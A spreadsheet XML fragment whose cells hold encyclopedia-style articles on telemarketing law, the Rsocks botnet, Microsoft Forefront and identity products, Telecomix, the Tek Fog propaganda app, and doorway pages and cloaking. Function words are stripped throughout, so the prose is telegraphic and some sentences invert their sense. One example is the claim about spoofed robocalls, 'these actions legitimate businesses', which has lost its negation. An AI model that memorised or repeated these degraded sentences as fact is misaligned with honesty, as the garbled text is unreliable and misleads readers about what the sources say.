companies frequently referred "telemarketing boiler rooms" simply "boiler rooms". telemarketing often criticized unethical business practice perception high-pressure sales techniques unsolicited calls. telemarketers marketing telephone companies participate telephone slamming, practice switching customer's telephone service without knowledge authorization. telemarketing calls often considered annoyance, especially occur dinner hour, early morning, late evening. some companies capitalized negative emotions. since 2007 several forums sprouted complaint boards consumers voice concerns criticism. response telemarketing companies filed lawsuits portals. current legal system grants forums certain degree protection "communications decency act, u.s.c 230" california's anti-slapp law. robotic telemarketing ringless voicemail recent trend telemarketing robocalls: automated telephone calls computerized autodialers computer-delivered pre-recorded messages sales pitch. some simulate personalized phone call personalized pre-recorded messages. telemarketing recently advanced implement programmed women's voice operator instead hiring real woman perform task (see example samantha west). this attempt shown unsuccessful. however, scholars argue technological advancements reinforce commoditization woman's speech marketable entity lead "gendered hierarchy communication".: others tactics, ringless voicemail, directly deliver voice message directly landline's cellphone's voicemail. original purpose provide nonintrusive method delivering valuable messages. there debate ringless voicemail causing issues relating "hijacking" voicemail companies, would disallow family friends access voicemail. regulations countries telemarketing subject regulatory legislative controls related consumer privacy protection. united states telemarketing united states america restricted federal level telephone consumer protection 1991 (tcpa) u.s.c. 227) ftc's telemarketing sales rule (tsr). derives regulatory authority tcpa, adopted 64.1200 telemarketing consumer fraud abuse prevention act, u.s.c. 6101–6108. many professional associations telemarketers codes ethics standards member businesses follow encourage public confidence. some jurisdictions implemented call" lists industry organizations legislation; telemarketers restricted initiating contact participating consumers. legislative versions often provide heavy penalties companies call individuals listings. u.s. federal trade commission implemented national call registry attempt reduce intrusive telemarketing nationwide. telemarketing corporations trade groups challenged violation commercial speech rights. however, u.s. 10th circuit court appeals upheld national call registry february 2004.companies telemarketing sales tool governed united states federal regulations outlined (amended january 2003 originally issued 1995) tcpa. addition federal regulations, telemarketers calling nationally must also adhere separate state regulations. most states adapted call" files own, states share u.s. federal call registry. each u.s. state also regulations concerning: permission record, permission continue, rebuttaling statutes, sunday holiday calls; well fines punishments exacted violations. september 2009, regulations banning robocalls went effect. since many telemarketing calls originate offshore, beyond reach legal regulatory agencies, national call registry usually ignored, well regulations, every possible number called area code block. some automated services sophisticated enough analyze audio answering party, determines human respond, call repeatedly limit reached. this coupled fake caller display ("spoofing") mislead call recipient answering, even thinking local number calling. these actions legitimate businesses. telemarketing techniques increasingly used political campaigns. because free-speech issues, laws governing political phone calls much less stringent applying commercial messages. even number states barred restricted political robocalls. national call registry helped substantially curb telemarketing calls landlines also helped increasing trend telemarketers target mobile phones. result, greater push mobile applications help unwanted calls telemarketers, like privacystar. these companies helped thousands complaints registry, since inception registry itself. canada telemarketing canada regulated canadian radio-television telecommunications commission (crtc), agency federal department innovation, science economic development canada. canadians register national call list (dncl) reduce number telemarketing calls received. anyone received telemarketing call violation unsolicited telecommunications rules file complaint national dncl. national dncl operator forwards complaints crtc, determines whether complaint warrants investigation, based initial assessment. australia telemarketing australia restricted australian federal government policed australian communications media authority (acma). australian federal legislation provides restriction calling hours research marketing calls.in 2007 call register established australian inbound telephone numbers. register allows user register private telephone numbers. australian federal legislation limits types marketing calls made registered telephone numbers; however, research calls allowed. other exemptions include calls made charities political members, parties candidates however organisation instructed recipient telemarketing call, call number again, legally obliged comply, must remove phone number organisations calling list(s). inbound telemarketing another major industry. involves live operators ivr—interactive voice response. also known audio text automated call processing. usually, major television campaigns advertisers toll-free telephone number answered service bureaus. such service bureaus technology call capacity process large amounts simultaneous calls occur toll-free telephone number advertised television. england/uk british police, noting high rate pensioners affected, recommended do-not-call registry enrollment enhance "phone security." specific mention also made calls "overseas companies." finland finland, call centers employ estimated 100,000 people, work customer relations larger companies. 10,000 people working companies involved telemarketing. telemarketing often first young people get. also back labour market handicapped, immigrants pensioners, finland, profession reputation work-related injuries. strain neck, shoulders, eyes ears considerable. health problems however reduced considerably thanks lightweight headsets, ergonomic working stations tasks, like documentation, done automatically computers. france ability cause french phone number appear caller display, call originates outside france removed passed july 2018; implementation delayed august following year. technology agent-assisted automation autodialer automatic call distributor customer relationship management predictive dialer private branch exchange teleblock natural predictive dialing ringless voicemail also boiler room (business) call centre cold calling direct marketing list call centre companies marketing reloading scam spamming sucker list nuisance call business portal telephones portal references external links file complaint call registry federal trade commission call registry laws regulating telemarketers telephone preference service call registry</t>
  </si>
  <si>
    <t>Domain Assurance Council</t>
  </si>
  <si>
    <t>domain assurance council (dac) trade association started summer 2006 paul hoffman john levine. members members divided categories. they include full members goodmail habeas returnpath trend micro technology members client members constant contact members daddy also vouch reference dkim references external links official website archived snapshot march 2010 domain assurance council longer active.</t>
  </si>
  <si>
    <t>Domain Based Security</t>
  </si>
  <si>
    <t>"domain based security", abbreviated "dbsy", model-based approach help analyze information security risks business context provide clear direct mapping risks security controls needed manage them. variant approach used government's infosec standard no.1 technical risk-assessment method. dbsy registered trade mark qinetiq ltd. dbsy developed late 1990s defence evaluation research agency (dera). model-based approach information assurance describes requirements security organisation, taking account business needs supported. model based around concept security domain, represents logical place people work information using computer system, connections security domains necessary support business activity. hence focus information needs protection, people work people exchange information with. model also describe physical environments people work system boundaries major system security measures placed. systematic method applied model identify describe risks valuable information assets exposed specify security measures effective managing risks. history dbsy origins late 1990s, developed defence evaluation research agency (dera) ministry defence (mod). initially called domain based approach, developed alongside purple penelope support mod's increasing need interconnections systems operating different security levels,it recognised risks associated connections directly related nature information exchange needed effective model understanding managing risks would need take account business needs information sharing. also recognised controlled release information system handling secret information (sometimes referred time 'down grading' 'sanitisation') adequately described existing models information security (notably bell-lapadula, biba associated information flow models). information flow models found unhelpful understanding risks information shared people systems entirely trusted. effective model understanding managing risks would need take account business needs exchanging information within outside organisation.the modelling technique applied major projects result experience graphical modelling techniques revised rigorous risk assessment method, based concepts compromise paths developed. approach security documentation project lifecycle also created. domain based security conferences held qinetiq malvern june 2005 june 2006, promoting discussion could widely used, defence commercial systems variant dbsy method subsequently developed incorporated government's infosec standard no.1 technical risk assessment method, standard method used security risk assessments government information technology systems. dbsy model dbsy approach uses simple models represent requirements security organisation using different related viewpoints: infosec business model represents security aspects business, infosec infrastructure model represents logical provision strong boundaries enforce separation. when combined, make infosec architecture model this model forms basis conducting systematic rigorous risk assessment. infosec business model defines security domains connections them. model specifies limits information processed exchanged security domains forms security requirements business. particular, connections explicitly modelled permitted required occur. security domain characterised information assets, valuable organisation, well people work information applications services behalf. connections domains characterised nature interaction required (such interpersonal messages, shared access database) sensitivity integrity requirements information exchange. model also represent kinds physical environment domain accessed. infosec infrastructure model defines islands computing infrastructure required logically separate, information cannot exchanged except identifiable manageable points connection, referred causeways. island characterised strength separation islands people manage computing infrastructure. infosec architecture model combines business infrastructure views, showing security domains supported islands infrastructure. where connections security domains hosted different islands, connections must supported appropriate causeway. risk assessment method dbsy method uses rational risk framework describing risks information assets exposed. similar kinds assets grouped together focus interest, risk assessment process applied focus interest turn. factors determining risk particular focus interest are: business impact compromise confidentiality, integrity availability focus interest; sets people might wish inflict damage (threat sources) motivation groups people different opportunities inflict damage (threat actors) capability also threat sources could influenced others; means threat actor might cause damage (causes compromise); defences place planned) protect focus interest.this risk framework applied systematic fashion organisation-specific infosec architecture model, representing security-relevant features organisation's business systems. through process compromise paths systematically described relative effectiveness different countermeasures assessed comparison risk methods dbsy differs risk management methods primary focus people, business drivers organisation business works, rather technical security measures. analyst required systematically define groups people pose threat ways might cause harm, providing rigorous, business-oriented framework concepts threat vulnerability. understand analyse information security risks faced organisation, especially risks appear conflict needs business efficiency across organisation dealings customers business partners. references</t>
  </si>
  <si>
    <t>Rsocks</t>
  </si>
  <si>
    <t>rsocks (stylized caps) russian internet proxy service provider shut department justice june 2022 using stolen addresses hacked pcs, mobile devices selling unsuspecting users. history rsocks launched 2014. based research done krebsonsecurity.com, site launched denis “neo” kloster (born september 1996), omsk, russia. other sources suggest real last name emilyantsev. according kloster's social media posts, visa operating york 2013, decided travel world work remotely.when existence, rsocks offered residential, mobile, data center proxies shared dedicated basis. take june 2022, department justice announced take rsocks website displayed message seized. take partnership governments germany, netherlands united kingdom. rsocks operation largest kind used millions hacked devices botnets around world. rsocks botnet, operated russian cybercriminals, comprised millions hacked devices worldwide. rsocks botnet initially targeted internet things (iot) devices. devices include broad range devices—including industrial control systems, time clocks, routers, audio/video streaming devices, smart garage door openers, connected communicate over, internet, therefore, assigned addresses. rsocks botnet expanded compromising additional types devices, including android devices conventional computers. stated operation "highly sophisticated russia-based cybercrime organization." however disclose specific suspect names, disclose anyone arrested.according doj, anyone could proxies rsocks access pool proxies specified time period, prices ranging access 2,000 proxies $200 access 90,000 proxies. also proxy server (vpn) references</t>
  </si>
  <si>
    <t>Microsoft Identity Integration Server</t>
  </si>
  <si>
    <t>microsoft identity integration server (miis) identity management (idm) product offered microsoft. service aggregates identity-related information multiple data-sources. goal miis provide organizations unified view user's/resources identity across heterogeneous enterprise provide methods automate routine tasks. miis manages information retrieving identity information connected data sources storing information connector space connector space objects csentry objects. csentry objects mapped entries metaverse called metaverse objects mventry objects. this architecture allows data dissimilar connected data sources mapped mventry object. back-end data stored microsoft server.for example, metaverse organization's e-mail system linked human resources database organization's system data repository containing relevant user information. each employee's attributes e-mail system human resources database imported connector space respective management agents. e-mail system link individual attributes employee entry, employee telephone number. employee's telephone number changes, telephone number automatically propagated e-mail system. goals identity management establish support authoritative source information every known attribute preserve data integrity according predetermined business rules. market products miis stands implementing state-based architecture. majority competitors offering transaction-based products. approach miis requires software/drivers/agents/shims installed target system. extensibility product extensible .net framework, allows developers network administrators extend out-of-the-box capabilities perform complex tasks. versions zoomit (pre 1999) microsoft metadirectory server [mms] (1999–2003) microsoft identity integration server 2003 enterprise edition [miis] (retired) microsoft identity integration server 2003 feature pack [iifp] (retired) microsoft identity lifecycle manager server 2007 (retired) microsoft forefront identity manager 2010 (retired) microsoft identity manager 2016 [mim] (current) history miis origins canadian companies' products, linkage software's metadirectory product linkage directory exchange (lde) microsoft acquired june 1997 zoomit corporation's metadirectory product, via, microsoft acquired july 1999.lde strongly email system oriented traces field mapping technology remain miis 2003. after acquiring zoomit microsoft renamed (microsoft metadirectory services) offered product free; however strongly encourage customers hire microsoft consulting services install configure product. microsoft identity integration server 2003 completely re-written ground original zoomit code moved miis. however microsoft preserved methodology original idea product. miis 2003 longer uses zscript (proprietary scripting language zoomit via), instead offered .net framework support. with upgrade microsoft offer migration path miis significant differences products. currently service pack available miis 2003. iifp slimmed-down version miis limited synchronization adam, exchange datastores.in fall 2007 miis 2003 incorporated offering called identity lifecycle manager (ilm) 2007. this product announced conference february 2007 made available customers 2007. identity lifecycle manager 2007 includes original miis 2003 product, also component called certificate lifecycle manager (clm) used manage x.509 digital certificate smart card issuance. future developments future releases miis/ilm expected only; support expected dropped, following suite exchange server public release candidate (rc) version identity lifecycle manager available (december 2008) microsoft server 2008 back-end dependency supported data sources miis 2003, enterprise edition, includes support wide variety identity repositories including following. network operating systems directory services microsoft windows active directory, active directory application mode, directory server, novell edirectory resource access control facility (racf), sunone/iplanet directory, x.500 systems network directory products e-mail lotus notes lotus domino, microsoft exchange 5.5, 2000, 2003, 2007, 2010, 2013. application peoplesoft, products, erp1, telephone switches pbx, xml- directory service markup language dsml-based systems database microsoft server, oracle rdbms, informix, dbase, file-based dsmlv2, ldif, comma-separated values csv, delimited, fixed width, attribute value pairs other: miis provides developers well defined framework create additional management agents .net framework languages currently available market) available out-of-the box. microsoft well third party vendors provide wide array additional management agents, openldap, unidata, peoplesoft, windows live id/hotmail, mysql etc. limitations while miis appears support dsml, currently out-of-the-box support spml version version 2.0. standardization service provisioning space would benefit consumers assist avoiding costly lock-in proprietary systems. also identity lifecycle manager password change notification service (pcns) watermark (data synchronization) references external links openldap management agent mysql management agent troubleshooting ldap connection issues microsoft ilm/miis novell edirectory 8.7.3</t>
  </si>
  <si>
    <t>Microsoft Forefront</t>
  </si>
  <si>
    <t>microsoft forefront discontinued family line-of-business security software microsoft corporation. microsoft forefront products designed help protect computer networks, network servers (such microsoft exchange server microsoft sharepoint server) individual devices. 2015, actively developed forefront product forefront identity manager. components forefront includes following products: identity manager: state-based identity management software product, designed manage users' digital identities, credentials groupings throughout lifecycle membership enterprise computer system rebranded system center endpoint protection: business antivirus software product controlled network, formerly known forefront endpoint protection, forefront client security client protection. exchange online protection: software service version forefront protect exchange server: instead installing security program server, customer re-routes email traffic microsoft online service receiving them. discontinued threat management gateway: discontinued server product provides three functions: routing, firewall cache. formerly called internet security acceleration server server. unified access gateway: discontinued server product protects network assets encrypting inbound access request authorized users. supports virtual private networks (vpn) directaccess. formerly called intelligent application gateway. server management console: discontinued web-based application enables management multiple instances protection exchange, protection sharepoint microsoft antigen single interface. protection exchange: discontinued software product detects viruses, spyware, spam integrating multiple scanning engines security partners single solution protect exchange messaging environments. provides administration console includes customizable configuration settings, filtering options, monitoring features reports, integration forefront online protection exchange (fope) product. after installation, managing multiple exchange servers done protection server management console. additionally, managed using windows powershell, command-line shell task-based scripting technology enables automation system administration tasks. protection sharepoint: discontinued product protects microsoft sharepoint server document libraries. enforces rules prevent documents containing malware, sensitive information, out-of-policy content uploaded. protection server management console windows powershell used manage protection sharepoint server multiple servers. security office communications server: protects computers running microsoft office communications server malware. formerly called antigen instant messaging. history predecessor forefront server protection products antigen line antivirus products created sybari software. sybari acquired microsoft 2005, first microsoft-branded version product called microsoft forefront security sharepoint (fssp) version fssp version supports microsoft office sharepoint server 2007 microsoft windows sharepoint services version whereas fpsp (the last version product) supports microsoft office sharepoint server 2010, microsoft sharepoint foundation 2010, microsoft office sharepoint server 2007 sp1, windows sharepoint services version sp1. also microsoft servers references external links official website microsoft forefront server protection blog archived 2010 wayback machine technet blogs</t>
  </si>
  <si>
    <t>Telecomix</t>
  </si>
  <si>
    <t>telecomix decentralized cluster activists, committed freedom expression name used werebuild telecomix. werebuild collaborative project used propose discuss laws well collect information politics politicians. telecomix operative body executes schemes proposals presented werebuild. september 2011, telecomix diverted connections syrian web, redirected internauts page instructions bypass censorship.moreover, "telecomix circulated ways using landlines circumvent state blockages broadband networks" egyptian revolution 2011. also 2011, telecomix large release blue coat surveillance files, allegedly revealing vast interception syria, analyzed made public "telecommunist cluster" telecomix. leak previously criticized possibly revealing much sensitive information syrian users security researcher hacker jacob appelbaum. history organization created april 2009, suggestion following seminar surveillance, legislative changes regulating national defence radio establishment (fra), laws processed european parliament time. audience asked help stop surveillance laws passed european parliament. evening seminar spontaneous bifurcation started someone threw cipher. telecomix born.during first months telecomix' existence, focus mostly telecoms package, data retention directive laws regulating fra. work consisted gathering information laws political processes involved, public conversations legislators projects.as organization grew larger, definition boundaries cluster became undefined. according interview, activist described ever growing bunch friends things together" consisting "[...] roughly extremely active members, active total including lurkers". origins telecomix roots heterogenous activist hacker scene. many founding members followed participated around piratbyrån pirate bay. there membership overlap julia group quadrature net, well hackerspaces forskningsavdelningen malmö, gothenburg hackerspace sparvnästet stockholm. telecomix vague concept "member" group (the formal ritual enter chat), however difficult assess certainty origins are.according marcin kaminski, gave earliest interviews telecomix's first project (which used domain telekompaketet.se, unrelated site owner), points heritage line piratbyrån sudden side-project called tapirbyrån ("the bureau tapirs", anagram word pirate swedish), formation telecomix. apart statement kaminski, known written records story, member tapirbyrån confirmed denied it.as telecomix founded, initial work consisted engaging parliamentary politics, serve interface concerned communities politicians. work gradually moved direct interventions rescue operations, cluster moved gradually militaristic rhetoric, heavy influences 1990s-style crypto-anarchism.however, 2011 telecomix activists given interviews talks various technology-related conferences real names. this stark contrast earlier practice eschewing real individual names favour using telecomix collective pseudonym.rasmus fleischer argues formation telecomix signified long pirate rhetoric, instead shifted attention hacktivist approach politics. moreover, christopher kullenberg describes "telecomix news agency" shaped consequence close online offline friendships connection trial pirate manifesto nätpolitiska manifestet.in book svenska hackare ("swedish hackers"), technology journalists, daniel goldberg linus larsson, describe werebuild project name used telecomix) appeared seminar neutrality held swedish government 2009, influence implementation telecoms package. projects operations streisand project created hosted telecomix streisand project, named streisand effect. mirror certain types content gets blocked censored. werebuild werebuild decentralized wiki page containing telecomix information projects. egypt operations during internet blackout early 2011, telecomix released video stating would launch series attempts restoring internet connectivity means modems, faxes rerouting traffic. syria operations similar approach egypt operations, organization intervening syrian networks. notable event telecomix released files blue coat systems surveillance equipment. blue coat systems eventually forced admit devices used syria, although directly sold country. search.telecomix.org telecomix hosted search service based seeks archived 2011-11-01 wayback machine, open-source peer-to-peer distributed search engine emphasis user privacy. seeks implements decentralized peer-to-peer architecture: install seeks machine, server laptop, automatically start sharing results. while users share queries peer-to-peer network, seeks protects privacy sending encrypted query fragments peers. this scheme makes difficult peers devise initial query. blackthrow telecomix members often experiment unorthodox encryption technologies. project "blackthrow" concept computer (sharing etymology word black fax), described blackthrow small computer hidden inside government agencies corporations. connects networks publishes server hidden service networks. tcmb (telecomix crypto munitions bureau) field agent connect blackthrow anonymously remote control deliver type packets location internets, host organization connect to." questionable legality blackthrow computers, telecomix maintains records devices live running. logo logo contains variety symbols. origins remain unclear, common interpretation pyramid middle symbol kopimi philosophy, project originally started piratbyrån. moreover, lightning arrows seem originate logo televerket (sweden), telecoms monopoly sweden. star (also present televerket symbol) symbol telecommunism, omega sign symbol resistance, ohm's law. this interpretation symbols sometimes referred gothenburg interpretation, many founding members town. others have, however, associated symbols logotype secret societies, several associated illuminati freemasonry.in article french magazine lesinrocks, fabrice epelboin argues pyramid telecomix logo symbolizes power, bordered bunch elements omega, lightning, star challenge ahead". article fabrice d'almeida, historian propaganda images describes logo "giving impression large machine capable unleashing great energy". jellyfish telecomix often refer oceanic concepts describing overall structure. they state siphonophoric organism transmitting genome memes imitation rather rules regulations".jellyfish important part symbolism telecomix, circulating meme organizational concept guiding participants evolving organization. june 2009 blog post "jellyfish memetics" posted telecomix-affiliated blog, arguably sparking great interest within telecomix philosophical implications decentralized self-organization. datalove notion "datalove" appeared first time several manifestos written telecomix, "inspire body-politic incarnate creatively totemized teleportation-flows datalove". concept datalove leitmotif several spawned projects site interactive datalove-experience. crypto-anarchism organization contributes general theme crypto-anarchism. their project cryptoanarchy.org(archived) aims promoting cryptographic research security technologies. cameron organization maintains megahal speech named cameron. according member computer generated representation us". cameron become core symbol telecomix, function governing actions activists remains obscure. references external links official website</t>
  </si>
  <si>
    <t>Microsoft Certified Partner</t>
  </si>
  <si>
    <t>microsoft certified partner (mcp) firm provides microsoft-related products services, support such. part microsoft partner network. they confirmed microsoft official, work effectively, help customers range information technology (it) projects specific products services. while accredited provide support level microsoft gold certified partner support services, many mcps offer support part services. mcps provide microsoft services behalf microsoft worldwide, spanning many fields including original equipment manufacturer (oem), education, software providers, technical support. they 24-hour access microsoft support, enables provide reliable customer support. every business least years, passed several tests, proven skills particular field. microsoft rewards partners discounts tools applicable activities. example, educational field might take form licenses microsoft windows microsoft office. return participating program, partners gain support services tools microsoft, often significant discount retail prices. however, lifetime contract risk transferred microsoft return benefits association microsoft ability sell support services. microsoft gold certified partner microsoft gold certified partners microsoft's highly accredited independent technical support providers. they must offer support data management software development. becoming partner requires microsoft technology primary platform firm. microsoft certified training partner microsoft certified training partner training company, independent unowned microsoft, officially approved microsoft provide technical training expertise microsoft products part program. content training courses provided microsoft certified training partner companies certified microsoft regarding accuracy instruction given. receive certification, microsoft certified training partner must demonstrate broad range expertise microsoft products. microsoft certified instructors required real-world expertise microsoft products well hold current microsoft certifications. microsoft certified training partner levels microsoft certified training partner basic level microsoft certified training partner program. they paid become certified, must microsoft tools support. microsoft gold certified partner highest level microsoft certified partner program. these firms free access tools support need microsoft. references external links official website</t>
  </si>
  <si>
    <t>Telecom network protocol analyzer</t>
  </si>
  <si>
    <t>telecom network protocol analyzer protocol analyzer analyze switching signaling telecommunication protocol different nodes pstn mobile telephone networks, networks, cdma networks, wimax mobile telecommunication network analyze traffic bsc, bts, hlr, vlr, hlr, protocol analyzers mainly used performance measurement troubleshooting. these devices connect network calculate performance indicators monitor network speed-up troubleshooting activities. external links communications protocol analyzer overview tektronix protocol analyzer overview utel systems network monitoring</t>
  </si>
  <si>
    <t>Tek Fog</t>
  </si>
  <si>
    <t>mobile phone software application reportedly used bharatiya janata party (bjp), right-wing hindu nationalist party ruling party india since 2014. purpose software infiltrate social media platforms promote favourable viewpoints misinformation targeting users perceived party opponents. also managed huge database indian citizens included specific data regarding occupation, religion, age, gender, etc., used deliver targeted insults criticism. function software manipulate trending features twitter facebook automatically sharing retweeting posts, promoting existing hashtags trending levels. monde commented perhaps elaborate online political manipulation operation ever discovered.alerted disgruntled employee-turned-whistleblower, independent indian news publication wire conducted two-year investigation published findings january 2022, reporting application used artificially inflate popularity bharatiya janata party, harass critics manipulate public perceptions scale across major social media platforms" "amplify right-wing propaganda".the wire investigation implicated bjp, along private companies persistent systems mohalla tech (which operates service called sharechat), deployment app. bjp's youth wing (bjym) members said supervised operators, giving ideological directions. reported mohalla tech involved management fog, whistleblower paid mohalla tech assigned client, sharechat widely exploited fog. investigation found persistent systems involved production management fog. internal source within persistent systems confirmed involvement company, 17,000 files connected developed persistent systems.opposition parties denounced national security threat demanded probe. ruling prime minister narendra modi responded wire report. youth wing functionary devang dave, said supervised operation, denied party's involvement. derek o'brien called meeting parliamentary standing committee home affairs discuss app. congress urged supreme court expert panel investigate app. editors guild india condemned "the online harassment women journalists, includes targeted organised online trolling well threats sexual abuse" demanded steps break dismantle "misogynistic abusive digital eco-system" fog. ministry electronics information technology, response parliamentary committee, said unable find mobile stores. wire investigation investigation wire found used information technology cell bharatiya janata party (bjp cell) part social media political propaganda campaign. 2022, wire reported used artificially inflate popularity party, harass critics manipulate public perceptions scale across major social media platforms."tek used manage inauthentic accounts masse across multiple social media platforms. able hack contact lists inactive whatsapp accounts and, impersonating inactive whatsapp account owner, send propaganda messages user's contacts.the wire's report described capable several actions. some capabilities reportedly incorporated listed below: hijacking social media trends able hijack trending section social media sites, twitter facebook. fog's operators shared forwarded social media messages individuals groups automatically. this used artificially inflate popularity "extremist narratives political campaigns". phishing capturing inactive whatsapp accounts enabled bulk-hacking inactive whatsapp accounts, mass-message accounts' contacts propaganda messages, messages sent appearing recipieints owner inactive whatsapp account. inactive whatsapp accounts live accounts owners, either whatsapp uninstalled, user's phone reset.the worked targeting active whatsapp accounts sending accounts media file (video image) unknown number. media file contained spyware activated downloaded, point renders phone vulnerable remote surveillance. hacker able monitor activity status device. phone became inactive app-uninstallation phone reset, hacker could seize control target account send messages remotely, without owner's knowledge.only inactive whatsapp accounts targeted, since owners active whatsapp accounts would inevitably learn fraudulent messages sent contacts remotely.according wire, verifying activity, whistleblower access able hack take control test whatsapp account used reporters "within minutes." application sent message frequent contacts captured account. database citizens' private information extensive, dynamic cloud database containing private citizens' personal information, "occupation, religion, language, age, gender, political inclination even physical attributes like skin tone breast size." wire received screenshots showed parameters. wire verified existence database monitoring harassment messages directed surprising amount detail female journalists among targeted groups. database could automatically generate messages, mostly hateful abusive nature, either connecting google sheets automatically generating phrases. modification existing news articles fake news functionality included ability modify existing news articles change links keywords. changed link would lead reader webpage looked similar original website fake content replacing original author's article. text modification capabilities powered artificial intelligence models. automated messaging also designed send bulk automated-messages fraudulent accounts primarily contained political propaganda abusive messages.tek users would send automated hate messages targeting muslims female journalists whose work diverged right-wing hindutva narrative. researchers discovered million replies received prominent women journalists twitter, posted five-month period, accounts operated fog. organisations involved fog's users said part political-corporate nexus linked large technology players platforms political party. this nexus included: bharatiya janata yuva morcha (bjym), youth wing bharatiya janata party. yuva morcha, former national social media head bharatiya janata currently worked election manager maharashtra, immediate supervisor person source wire investigation. bjym members supervised operators gave ideological direction. wire verified involvement using codes sent official email these codes helped identify secure server hosting external websites connecting server. persistent systems indian-american technology services company involved development maintenance. current employee company provided documents related development application company's internal servers. they showed around 17,000 assets found searching term "tek fog." sharechat social media platform created mohalla tech pvt. ltd. users also used sharechat test curate fake news, political propaganda hate speech automating popular social media platforms like twitter, facebook, whatsapp". involvement sharechat verified accounts controlled fog. these accounts created posts sharechat, twitter facebook april 2020. wire found social media posts accounts first uploaded sharechat, published twitter facebook. victims delhi union journalists (duj) released statement condemning stating women journalists "prime targets app" noting wire investigation listed several women journalists received million abusive tweets january 2021, including rana ayyub, barkha dutt, nidhi razdan, rohini singh, swati chaturvedi, sagarika ghose, manisha pande, faye d'souza, arfa khanum sherwani smita prakash.on january, journalist arfa khanum sherwani released list prominent women several religions including hinduism targeted harassed hackers using fog. reactions editors guild india, national non-profit organisation journalists, said wire investigation "laid bare extensive well funded network built around app, fog, steals unused whatsapp accounts send toxic messages targeted journalists", highlighting abuse received women journalists noting "the purpose deeply hurtful messages instil fear them". editors guild condemned "the continuing online harassment women journalists, includes targeted organised online trolling well threats sexual abuse", demanded "urgent steps break dismantle misogynistic abusive digital eco-system".the congress party called fog, poisonous weapon bjp's propaganda machinery, harmful country". minister state home maharashtra government, satej patil, questioned silence government india information technology ministry expose. patil demanded union government take cognisance issue. made public appeal victims mumbai targeted register police complaint, maharashtra police cyber crime investigation cell investigate case.journalist zarrar khuhro wrote dawn "was used many underhanded ways promote hateful hindutva ideology, particular abuse activists, journalists opposition politicians".devang dave, head bjym cell, denied anyone organisation knew app. persistent systems mohalla tech denied involvement fog.anand venkatnarayanan, indian internet security researcher author book information warfare, said military-grade psychological operations weapon. far, capabilities part accessible state actors used population enemy countries. said, "putting weapon hands non-state actors affiliated political party contesting mind space citizens democracy never done before." investigation parliamentary standing committee home affairs january 2022, hindu reported anand sharma, head parliamentary standing committee home affairs, wrote ministry home affairs government india seeking response questions surrounding fog. they directed ministry co-ordinate ministries, provide information january 2022.the investigation initiated several calls standing committee investigate fog. rajya sabha derek o'brien trinamool congress), member parliamentary standing committee home affairs, previously wrote anand sharma, head committee, discuss secret "tek fog" "has serious ramifications could jeopardise national security." o'birne wrote, "this application capable penetrating encrypted messaging platforms secure social media conversations, order heavily manipulate exploit narratives said platforms." chairman sharma reported taken note matter, stating discussed next meeting parliamentary panel home affairs. january, o'brien wrote second letter convene meeting discuss fog. wrote provided ability hijack whatsapp accounts citizens using spyware inactive contacts hijacked number, uploaded database, send mass messages. letter also pointed hacking technique formerly used pegasus spyware group developed even sophisticated zero-click hijacking method. application, o'brien, could send automated messages, spread misinformation, fake news mislead citizens.on january, congress leader leader opposition sabha adhir ranjan chowdhury also wrote chairman parliamentary standing committee home affairs, anand sharma, asking committee discuss "violative software application fog" next meeting.the parliamentary standing committee asked union home ministry provide information app. february, responding request, minister state electronics information technology rajeev chandrasekhar stated, "the ministry searched prominent stores stores could find called online stores." call supreme court intervention congress spokesperson supriya shrinate held press conference issue "urged supreme court look punish, uncertain terms, people behind right freedom erode india's democracy." congress wanted supreme court issue examined expert panel looking alleged pegasus spyware indian citizens. shrinate said "targets indian citizens hurts foundation democracy." congress leader rahul gandhi called several "factories hate" bjp.the editors guild india delhi union journalists (duj), statements, also called supreme court inquiry. also pegasus project revelations india references further reading part "tek fog: with footprints cyber troops automate hate, manipulate trends". wire. january 2022. "explainer: here's what should care". wire. january 2022. part "tek fog: morphing urls make real news fake, 'hijacking' whatsapp drive propaganda". wire. january 2022. part "tek action: targeting women journalists, pushing communal narrative covid, delhi violence". wire. january 2022. external links @thewire_in january 2022). "tek fog: quick explainer" (tweet) twitter. wire prime time with ravish kumar: सावधान! आपके बच्चों दंगाई देगा [prime time with ravish kumar: beware app! [it] turn kids rioters] hindi). ndtv. january 2022. interview: exposé writers cell goes behind automated trolling". newslaundry. retrieved february 2022.</t>
  </si>
  <si>
    <t>Techreturns</t>
  </si>
  <si>
    <t>techreturns nederland dutch company founded reduce electronic waste (e-waste). buying used electronics, especially mobile phones, consumers companies repair give second life. some choose donate mobile phone organisations masterpeace artis zoo. company's revenues comes selling second hand devices mainly asia africa market affordable, quality electronics. sales also take place europe, especially netherlands sister company beatsnew. techreturns connected closing loop foundation collecting e-waste developing countries recycling. involved project also organisations fairphone text change.recently, techreturns appeared multiple times dutch media, instance discussion sustainability initiatives dutch government, annual summary dutch sustainable businesses 2013 netherlands consumer television programme kassa 14-01-14 segment reuse versus recycling electronic industry.techreturns founded 2009, based amsterdam, netherlands part social enterprise nederland. additionally techreturns department genova, italy. references</t>
  </si>
  <si>
    <t>TechForward</t>
  </si>
  <si>
    <t>techforward electronics recycling startup business founded 2006 backed venture capital, insures electronics upgrade. based california, sells "upgrade policies" guarantee back working electronics within years purchase. offers policies computers, tvs, players, satellite navigation systems. resells recycles electronics. also electronic waste united states references external links techforward</t>
  </si>
  <si>
    <t>Doorway page</t>
  </si>
  <si>
    <t>doorway pages (bridge pages, portal pages, jump pages, gateway pages entry pages) pages created deliberate manipulation search engine indexes (spamdexing). doorway page affect index search engine inserting results particular phrases sending visitors different page. doorway pages redirect visitors without knowledge form cloaking. this usually falls black seo. visitor clicks typical doorway page search engine results page, cases redirected fast meta refresh command another page. other forms redirection include javascript server sides redirection, server configuration file. some doorway pages dynamic pages generated scripting languages perl php. doorway pages often easy identify designed primarily search engines, human beings. sometimes doorway page copied another high ranking page, likely cause search engine detect page duplicate exclude search engine listings. because many search engines give penalty using meta refresh command, doorway pages trick visitor clicking link desired destination page, javascript redirection. more sophisticated doorway pages, called content rich doorways, designed gain high placement search results without using redirection. they incorporate least minimum amount design navigation similar rest site provide human-friendly natural appearance. visitors offered standard links calls action. landing pages regularly misconstrued equate doorway pages within literature. former content rich pages traffic directed within context pay-per-click campaigns maximize campaigns. doorway pages also typically used sites maintain blacklist urls known harbor spam, facebook, tumblr deviantart. cloaking doorway pages often also employ cloaking techniques misdirection. cloaked pages show version page human visitor different provided crawlers—usually implemented server-side scripts. server differentiate bots, crawlers human visitors based various flags, including source address user-agent. cloaking simultaneously trick search engines rank sites higher irrelevant keywords, displaying monetizing human traffic showing visitors spammy, often irrelevant, content. practice cloaking considered highly manipulative condemned within industry search engines, result significant 